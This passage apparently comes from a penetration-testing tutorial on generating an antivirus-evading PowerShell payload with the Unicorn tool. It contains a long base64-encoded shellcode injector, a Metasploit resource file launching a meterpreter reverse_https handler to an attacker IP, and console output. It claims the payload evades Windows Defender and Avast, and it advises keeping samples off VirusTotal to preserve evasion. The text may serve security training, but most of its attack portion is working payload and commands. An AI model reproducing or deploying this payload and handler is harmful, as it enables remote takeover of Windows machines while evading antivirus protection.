A'+'MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAFYAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQBsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAJABFAGQAIgA7AH0A')"

The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.

Start Msfconsole Using the Resource File

To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.

msfconsole -r /opt/unicorn/unicorn.rc

       =[ metasploit v4.16.59-dev-                        ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.

[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443

The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker’s IP address (LHOST), set the port number (LPORT), enable stager encoding(EnableStageEncoding), and start the msfconsole listener (exploit -j) — easy.

At this point, everything on the attacker’s side is set up and ready for incoming connections. Now it’s just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.

Test the Payload (Don’t Upload It to VirusTotal)

In my tests, Unicorn’s PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.

Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer’s explicitly caution against using VirusTotal every time the program starts.

As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.

As an alternative to online scanners, I encourage pentester’s to simulate their target’s operating system environment using virtual machines.